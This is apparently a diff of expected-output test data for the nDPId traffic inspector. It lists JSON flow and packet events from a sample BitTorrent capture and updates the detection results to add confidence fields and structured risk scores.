 00556{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1455469969259,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"ts_msec":1455469969259,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4K5tAAEAGAADAqAEDU9i48c6fyNXli2jySWt7B4AYK\/LO3wAAAQEIChnb9+x4G0bsE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1Bjvi3q9Fc8jVIrp0="}
-00683{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469969259,"flow_last_seen":1455469969259,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469969259,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"83.216.184.241","src_port":52895,"dst_port":51413,"l4_proto":"tcp","ndpi": {"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
+00717{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469969259,"flow_last_seen":1455469969259,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469969259,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"83.216.184.241","src_port":52895,"dst_port":51413,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
 00576{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1455469969318,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":148,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":148,"pkt_l4_len":114,"ts_msec":1455469969318,"pkt":"xCwDBkn+LFbcjDU0CABFYACGozdAADIG1mVT2LjxwKgBA8jVzp9Ja3sH5YtpNoAYECl7XAAAAQEICngbRx8Z2\/fsE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMTg4Qi2qniMLxLorRFP2hZAAAAEAFABkMTplaTBlNA=="}
 01372{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1455469969391,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":648,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":648,"pkt_l4_len":614,"ts_msec":1455469969391,"pkt":"xCwDBkn+LFbcjDU0CABFYAJ6SOJAADIGLsdT2LjxwKgBA8jVzp9Ja3tZ5YtpNoAYECl87wAAAQEICngbR0YZ2\/gmOmlwdjQ0OlPYuPE0OmlwdjYxNjr+gAAAAAAAAOoGiP\/+zfQTMTI6Y29tcGxldGVfYWdvaTFlMTptZDExOnVwbG9hZF9vbmx5aTNlMTE6bHRfZG9udGhhdmVpN2UxMjp1dF9ob2xlcHVuY2hpNGUxMTp1dF9tZXRhZGF0YWkyZTY6dXRfcGV4aTFlMTA6dXRfY29tbWVudGk2ZWUxMzptZXRhZGF0YV9zaXplaTE5MDA5ZTE6cGk1MTQxM2U0OnJlcXFpMjU1ZTE6djE1Os68VG9ycmVudCAxLjguODI6eXBpNTI4OTVlNjp5b3VyaXA0OlI3zQFlAAAAdAX\/\/3\/\/\/\/\/7\/3\/\/\/\/\/\/\/\/\/\/\/\/\/\/+\/\/\/\/\/b\/\/\/f\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/9\/\/\/\/7\/\/\/\/\/\/\/99\/\/\/\/\/\/3\/\/97\/v\/\/\/\/\/9\/\/v\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/+\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/f\/\/\/\/\/\/7\/\/\/X\/\/\/\/9\/\/+AAAAABQQAAAG6AAAABQQAAAITAAAABQQAAAHTAAAABQQAAAA1AAAABQQAAAAQAAAABQQAAAHdAAAABQQAAAMaAAAABQQAAAE+AAAABQQAAANHAAAABQQAAAN+AAAABQQAAAIEAAAABQQAAAHOAAAABQQAAAGSAAAABQQAAAC8AAAABQQAAANcAAAABQQAAAGMAAAABQQAAABAAAAABQQAAAFbAAAABQQAAAEBAAAABQQAAACdAAAABQQAAADUAAAABQQAAAC\/AAAABQQAAAKPAAAABQQAAANe"}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469969441,"flow_last_seen":1455469969441,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469969441,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.53.228.2","src_port":52896,"dst_port":14627,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00556{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1455469969441,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"ts_msec":1455469969441,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4XbBAAEAGAADAqAEDTzXkAs6gOSOymifHI+P1WoAYmwf1TQAAAQEIChnb+J8AAH2QE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1Bjqb8v2rPEXkzqd0="}
-00738{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469969441,"flow_last_seen":1455469969441,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469969441,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.53.228.2","src_port":52896,"dst_port":14627,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
+00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469969441,"flow_last_seen":1455469969441,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469969441,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.53.228.2","src_port":52896,"dst_port":14627,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469969441,"flow_last_seen":1455469969441,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469969441,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"120.62.33.241","src_port":52894,"dst_port":39332,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00556{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1455469969441,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"ts_msec":1455469969441,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4duZAAEAGAADAqAEDeD4h8c6emaQxnKbPGdPY9oAYmwdcRQAAAQEIChnb+J8AQ+diE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjsdMZTLXvd5m7DE="}
-00740{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469969441,"flow_last_seen":1455469969441,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469969441,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"120.62.33.241","src_port":52894,"dst_port":39332,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
+00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469969441,"flow_last_seen":1455469969441,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469969441,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"120.62.33.241","src_port":52894,"dst_port":39332,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
 00582{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1455469969680,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":151,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":151,"pkt_l4_len":117,"ts_msec":1455469969680,"pkt":"xCwDBkn+LFbcjDU0CABFAACJEvpAAHcG+5FPNeQCwKgBAzkjzqAj4\/VaspooC4AYAQLEvgAAAQEICgAAfaoZ2\/ifE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wovPx6i8m4ev0sHgAAADnFABkMTplaTBlNDppcA=="}
 01335{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1455469969689,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":620,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":620,"pkt_l4_len":586,"ts_msec":1455469969689,"pkt":"xCwDBkn+LFbcjDU0CABFAAJeEvxAAHcG+bpPNeQCwKgBAzkjzqAj4\/WvspooC4AZAQKoaAAAAQEICgAAfaoZ2\/ifdjQ0Ok815AIxMjpjb21wbGV0ZV9hZ29pNmUxOm1kMTE6dXBsb2FkX29ubHlpM2UxMTpsdF9kb250aGF2ZWk3ZTEyOnV0X2hvbGVwdW5jaGk0ZTExOnV0X21ldGFkYXRhaTJlNjp1dF9wZXhpMWUxMDp1dF9jb21tZW50aTZlZTEzOm1ldGFkYXRhX3NpemVpMTkwMDllMTpwaTE0NjI3ZTQ6cmVxcWkyNTVlMTp2MTU6zrxUb3JyZW50IDMuNC41Mjp5cGk1Mjg5NmU2OnlvdXJpcDQ6UjfNAWUAAAB0Bf\/\/\/\/\/\/\/\/\/\/\/f\/\/\/\/\/\/\/\/\/\/\/\/9\/7\/\/\/\/\/fv\/\/\/\/\/\/f\/\/\/3\/\/\/\/\/9\/7\/\/\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/\/\/\/v\/+\/\/\/\/9\/\/\/\/\/\/\/\/+\/\/\/9\/\/\/\/f\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/8\/\/\/\/\/\/f\/\/\/\/\/\/7\/\/\/\/\/\/f\/\/3\/P\/\/\/\/\/4AAAAAFBAAAA2sAAAAFBAAAAW0AAAAFBAAAAlYAAAAFBAAAAdEAAAAFBAAAAPQAAAAFBAAAAtIAAAAFBAAAAMsAAAAFBAAAAyUAAAAFBAAAAKMAAAAFBAAAAMQAAAAFBAAAAcEAAAAFBAAAAtMAAAAFBAAAAiUAAAAFBAAAAEYAAAAFBAAAAT8AAAAFBAAAAe4AAAAFBAAAAjwAAAAFBAAAAvgAAAAFBAAAA2oAAAAFBAAAA2AAAAAFBAAAAJgAAAAFBAAAATQAAAAFBAAAAQ4AAAAFBAAAA0w="}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469970233,"flow_last_seen":1455469970233,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469970233,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.26.95.30","src_port":52897,"dst_port":22673,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00556{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1455469970233,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"ts_msec":1455469970233,"pkt":"LFbcjDU0xCwDBkn+CABFAAB45PBAAEAGAADAqAEDlxpfHs6hWJHZNtVIfkyTS4AYJnO4TgAAAQEIChnb+7IRKfdEE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjjCQUdTBqR8vIZE="}
-00739{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469970233,"flow_last_seen":1455469970233,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469970233,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.26.95.30","src_port":52897,"dst_port":22673,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
+00856{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469970233,"flow_last_seen":1455469970233,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469970233,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.26.95.30","src_port":52897,"dst_port":22673,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
 00617{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1455469970293,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":178,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":178,"pkt_l4_len":144,"ts_msec":1455469970293,"pkt":"xCwDBkn+LFbcjDU0CABFAACkCYZAAHIGRuqXGl8ewKgBA1iRzqF+TJNL2TbVjIAYHVxFKAAAAQEIChEp94AZ2\/uyE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC2coXQqpAS87AVXIDwAAADnFABkMTplaTBlNDppcHY0NDqXGl8eMTI6Y29tcGxldGVfYWdvaTFlMQ=="}
 01298{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1455469970357,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":593,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":593,"pkt_l4_len":559,"ts_msec":1455469970357,"pkt":"xCwDBkn+LFbcjDU0CABFAAJDCYlAAHIGRUiXGl8ewKgBA1iRzqF+TJO72TbVjIAYHVwHogAAAQEIChEp97wZ2\/vsOm1kMTE6dXBsb2FkX29ubHlpM2UxMTpsdF9kb250aGF2ZWk3ZTEyOnV0X2hvbGVwdW5jaGk0ZTExOnV0X21ldGFkYXRhaTJlNjp1dF9wZXhpMWUxMDp1dF9jb21tZW50aTZlZTEzOm1ldGFkYXRhX3NpemVpMTkwMDllMTpwaTIyNjczZTQ6cmVxcWkyNTVlMTp2MTU6zrxUb3JyZW50IDMuNC41Mjp5cGk1Mjg5N2U2OnlvdXJpcDQ6UjfNAWUAAAB0Bf\/\/\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/2\/3\/\/\/\/r\/\/\/\/\/9\/3\/\/\/\/\/9\/+\/\/+\/\/+\/\/\/\/f\/\/\/\/\/\/9\/\/\/\/\/\/\/\/\/\/f\/9\/\/\/\/\/\/\/\/+\/\/\/+\/v\/\/\/7\/\/7\/\/9\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/\/\/4AAAAAFBAAAAUAAAAAFBAAAAboAAAAFBAAAArkAAAAFBAAAA0EAAAAFBAAAAD0AAAAFBAAAAvsAAAAFBAAAAPwAAAAFBAAAAPMAAAAFBAAAAqcAAAAFBAAAAX0AAAAFBAAAAY8AAAAFBAAAAaEAAAAFBAAAAo0AAAAFBAAAAPAAAAAFBAAAAegAAAAFBAAAAjYAAAAFBAAAARsAAAAFBAAAAm0AAAAFBAAAAoUAAAAFBAAAAUoAAAAFBAAAARkAAAAFBAAAAswAAAAFBAAAAiYAAAAFBAAAAXA="}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469970452,"flow_last_seen":1455469970452,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469970452,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.55.129.22","src_port":52893,"dst_port":12097,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00557{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1455469970452,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"ts_msec":1455469970452,"pkt":"LFbcjDU0xCwDBkn+CABFAAB41kZAAEAGAADAqAEDTzeBFs6dL0HtOa3YPhLeWYAYVhCSYwAAAQEIChnb\/IcCXeBSE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1Bjpi3Emqkm5uHs80="}
-00739{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469970452,"flow_last_seen":1455469970452,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469970452,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.55.129.22","src_port":52893,"dst_port":12097,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
+00856{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469970452,"flow_last_seen":1455469970452,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469970452,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.55.129.22","src_port":52893,"dst_port":12097,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469971321,"flow_last_seen":1455469971321,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469971321,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"198.100.146.9","src_port":52903,"dst_port":60163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00557{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1455469971321,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"ts_msec":1455469971321,"pkt":"LFbcjDU0xCwDBkn+CABFAAB48HJAAEAGAADAqAEDxmSSCc6n6wMx0mzN3F5zZYAYZooahAAAAQEIChnb\/+QB8nE1E0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjuG56+SlFtqa9S4="}
-00740{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469971321,"flow_last_seen":1455469971321,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469971321,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"198.100.146.9","src_port":52903,"dst_port":60163,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
+00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469971321,"flow_last_seen":1455469971321,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469971321,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"198.100.146.9","src_port":52903,"dst_port":60163,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
 00606{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1455469971481,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":170,"pkt_l4_len":136,"ts_msec":1455469971481,"pkt":"xCwDBkn+LFbcjDU0CABFAACcFzZAAHYG0wzGZJIJwKgBA+sDzqfcXnNlMdJtEYAYAQK5ewAAAQEICgHycUYZ2\/\/kE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wopccBVvnEHfGIYQAAADnFABkMTplaTBlNDppcHY0NDrGZJIJMTI6Y29tcGxldGU="}
 01309{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1455469971641,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":601,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":601,"pkt_l4_len":567,"ts_msec":1455469971641,"pkt":"xCwDBkn+LFbcjDU0CABFAAJLGqBAAHYGzfPGZJIJwKgBA+sDzqfcXnPNMdJtEYAYAQJeTwAAAQEICgHycVYZ3ACEX2Fnb2kyZTE6bWQxMTp1cGxvYWRfb25seWkzZTExOmx0X2RvbnRoYXZlaTdlMTI6dXRfaG9sZXB1bmNoaTRlMTE6dXRfbWV0YWRhdGFpMmU2OnV0X3BleGkxZTEwOnV0X2NvbW1lbnRpNmVlMTM6bWV0YWRhdGFfc2l6ZWkxOTAwOWUxOnBpNjAxNjNlNDpyZXFxaTI1NWUxOnYxNTrOvFRvcnJlbnQgMy40LjUyOnlwaTUyOTAzZTY6eW91cmlwNDpSN80BZQAAAHQF\/\/\/\/\/\/\/f9\/\/\/\/37\/\/7\/\/\/\/\/\/\/3r\/\/\/\/3+\/\/7\/\/\/\/3\/\/9\/\/\/\/\/\/\/\/\/\/\/37\/7\/\/\/\/f\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/f\/\/\/f\/\/\/\/\/v\/\/\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/+\/\/\/\/\/9\/\/\/gAAAAAUEAAAClAAAAAUEAAAAnQAAAAUEAAAAVwAAAAUEAAACuQAAAAUEAAAAUAAAAAUEAAAA8gAAAAUEAAAB4QAAAAUEAAADfAAAAAUEAAABUwAAAAUEAAAAKgAAAAUEAAAAN